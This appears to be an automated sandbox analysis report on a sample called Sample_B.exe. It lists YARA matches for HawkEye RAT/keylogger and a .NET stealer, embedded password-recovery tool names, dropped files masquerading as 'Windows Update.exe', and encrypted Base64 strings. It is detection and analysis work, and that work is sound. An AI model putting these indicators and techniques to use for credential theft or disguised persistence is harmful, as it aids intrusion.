                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamew32time.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameslui.exe.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameUSERCPL.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenametaskschd.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWMDM.dll.muiZ vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamebthci.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameMSHTMLER.DLL.MUID vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenapdsnap.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameREGSVC.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamesbdropj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamebrserid.sys.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamecomdlg32.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameSXS.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamedps.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWMPNSCFG.EXE.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamesdclt.exe.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWEBCHECK.DLL.MUID vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameAuxiliaryDisplayCpl.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameMBLCTR.EXE.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameEFSADU.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWPDMTPDR.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameNetworkItemFactory.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameMSCTF.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameaudiodev.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameaelupsvc.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamejscript.dll.muiH vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamegpedit.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078022149.0000000005A30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameMSOERES.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2077020537.0000000004710000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs Sample_B.exe
                          Source: Sample_B.exeBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs Sample_B.exe
                          Source: Sample_B.exeBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs Sample_B.exe
                          Source: Sample_B.exeBinary or memory string: OriginalFilenamemailpv.exe< vs Sample_B.exe
                          Source: Sample_B.exeBinary or memory string: OriginalFilenamePhulli.exe0 vs Sample_B.exe
                          Source: Sample_B.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                          Source: Sample_B.exe, type: SAMPLEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: Sample_B.exe, type: SAMPLEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: Sample_B.exe, type: SAMPLEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: 00000002.00000002.2113607102.00000000046F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 00000002.00000000.2075201287.0000000000EE2000.00000020.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: 00000002.00000000.2075201287.0000000000EE2000.00000020.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: 00000002.00000003.2082749506.00000000054A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: 00000002.00000003.2082749506.00000000054A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: 00000002.00000002.2113562918.00000000046E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 00000000.00000000.2069232329.0000000000BC2000.00000020.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: 00000000.00000000.2069232329.0000000000BC2000.00000020.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: 00000002.00000002.2111820758.0000000002371000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: 00000002.00000002.2111820758.0000000002371000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPEDMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPEDMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPEDMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPEDMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPEDMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPEDMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: 0.2.Sample_B.exe.2577280.5.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 2.2.Windows Update.exe.46e0000.9.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 2.2.Windows Update.exe.46f0000.10.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 0.2.Sample_B.exe.bc0000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 0.2.Sample_B.exe.bc0000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: 0.2.Sample_B.exe.bc0000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: 0.0.Sample_B.exe.bc0000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 0.0.Sample_B.exe.bc0000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: 0.0.Sample_B.exe.bc0000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: 2.2.Windows Update.exe.ee0000.1.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 2.2.Windows Update.exe.ee0000.1.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: 2.2.Windows Update.exe.ee0000.1.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: 0.0.Sample_B.exe.bc8208.3.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 0.0.Sample_B.exe.bc8208.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: 0.0.Sample_B.exe.bc8208.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: 2.0.Windows Update.exe.ee0000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 2.0.Windows Update.exe.ee0000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: 2.0.Windows Update.exe.ee0000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: 2.2.Windows Update.exe.f3fa72.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: 2.2.Windows Update.exe.f3fa72.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: 2.2.Windows Update.exe.ee9c0d.4.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: 2.2.Windows Update.exe.ee9c0d.4.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: 0.2.Sample_B.exe.bc9c0d.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: 0.2.Sample_B.exe.bc9c0d.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: 2.3.Windows Update.exe.54aec22.0.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: 2.3.Windows Update.exe.54aec22.0.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: 0.0.Sample_B.exe.bc9c0d.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: 0.0.Sample_B.exe.bc9c0d.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: 0.0.Sample_B.exe.c1fa72.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: 0.0.Sample_B.exe.c1fa72.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: 0.2.Sample_B.exe.c1fa72.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: 0.2.Sample_B.exe.c1fa72.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: 2.0.Windows Update.exe.ee8208.2.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 2.0.Windows Update.exe.ee8208.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: 2.0.Windows Update.exe.ee8208.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: 2.0.Windows Update.exe.f3fa72.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: 2.0.Windows Update.exe.f3fa72.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: 2.2.Windows Update.exe.ee8208.3.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 2.2.Windows Update.exe.ee8208.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: 2.2.Windows Update.exe.ee8208.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: 0.2.Sample_B.exe.bc8208.1.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 0.2.Sample_B.exe.bc8208.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: 0.2.Sample_B.exe.bc8208.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: 2.0.Windows Update.exe.ee9c0d.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: 2.0.Windows Update.exe.ee9c0d.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: 2.2.Windows Update.exe.23bfc84.6.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 2.2.Windows Update.exe.2392140.5.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 2.2.Windows Update.exe.2392140.5.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                          Source: 2.2.Windows Update.exe.2392140.5.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                          Source: Sample_B.exe, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                          Source: Sample_B.exe, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                          Source: Sample_B.exe, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                          Source: Sample_B.exe, Form1.csCryptographic APIs: 'CreateDecryptor'
                          Source: Windows Update.exe.0.dr, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                          Source: Windows Update.exe.0.dr, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                          Source: Windows Update.exe.0.dr, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                          Source: Windows Update.exe.0.dr, Form1.csCryptographic APIs: 'CreateDecryptor'
                          Source: Sample_B.exe, Form1.csBase64 encoded string: 'YlAuOB61JP7Xi5h8K5L2IGA3jMtN/jZDgXP5GUj1CQYs9MF2eXs+5iQpyz2Lq/2U', 'YHJmuJ6TTu5y2oLCttlBqrST5C8glLTFVKWb1Tx6kDjgbFUpHqEg8vimBaE9zP3ZbgA78xiY46Mx/vlEgZkTkg==', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                          Source: Windows Update.exe.0.dr, Form1.csBase64 encoded string: 'YlAuOB61JP7Xi5h8K5L2IGA3jMtN/jZDgXP5GUj1CQYs9MF2eXs+5iQpyz2Lq/2U', 'YHJmuJ6TTu5y2oLCttlBqrST5C8glLTFVKWb1Tx6kDjgbFUpHqEg8vimBaE9zP3ZbgA78xiY46Mx/vlEgZkTkg==', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                          Source: 0.0.Sample_B.exe.bc0000.0.unpack, Form1.csBase64 encoded string: 'YlAuOB61JP7Xi5h8K5L2IGA3jMtN/jZDgXP5GUj1CQYs9MF2eXs+5iQpyz2Lq/2U', 'YHJmuJ6TTu5y2oLCttlBqrST5C8glLTFVKWb1Tx6kDjgbFUpHqEg8vimBaE9zP3ZbgA78xiY46Mx/vlEgZkTkg==', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                          Source: 0.2.Sample_B.exe.bc0000.0.unpack, Form1.csBase64 encoded string: 'YlAuOB61JP7Xi5h8K5L2IGA3jMtN/jZDgXP5GUj1CQYs9MF2eXs+5iQpyz2Lq/2U', 'YHJmuJ6TTu5y2oLCttlBqrST5C8glLTFVKWb1Tx6kDjgbFUpHqEg8vimBaE9zP3ZbgA78xiY46Mx/vlEgZkTkg==', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                          Source: WindowsUpdate.exe.2.dr, Form1.csBase64 encoded string: 'YlAuOB61JP7Xi5h8K5L2IGA3jMtN/jZDgXP5GUj1CQYs9MF2eXs+5iQpyz2Lq/2U', 'YHJmuJ6TTu5y2oLCttlBqrST5C8glLTFVKWb1Tx6kDjgbFUpHqEg8vimBaE9zP3ZbgA78xiY46Mx/vlEgZkTkg==', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                          Source: 2.2.Windows Update.exe.ee0000.1.unpack, Form1.csBase64 encoded string: 'YlAuOB61JP7Xi5h8K5L2IGA3jMtN/jZDgXP5GUj1CQYs9MF2eXs+5iQpyz2Lq/2U', 'YHJmuJ6TTu5y2oLCttlBqrST5C8glLTFVKWb1Tx6kDjgbFUpHqEg8vimBaE9zP3ZbgA78xiY46Mx/vlEgZkTkg==', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                          Source: 2.0.Windows Update.exe.ee0000.0.unpack, Form1.csBase64 encoded string: 'YlAuOB61JP7Xi5h8K5L2IGA3jMtN/jZDgXP5GUj1CQYs9MF2eXs+5iQpyz2Lq/2U', 'YHJmuJ6TTu5y2oLCttlBqrST5C8glLTFVKWb1Tx6kDjgbFUpHqEg8vimBaE9zP3ZbgA78xiY46Mx/vlEgZkTkg==', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                          Source: 0.2.Sample_B.exe.bc0000.0.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                          Source: 0.0.Sample_B.exe.bc0000.0.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                          Source: WindowsUpdate.exe.2.dr, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
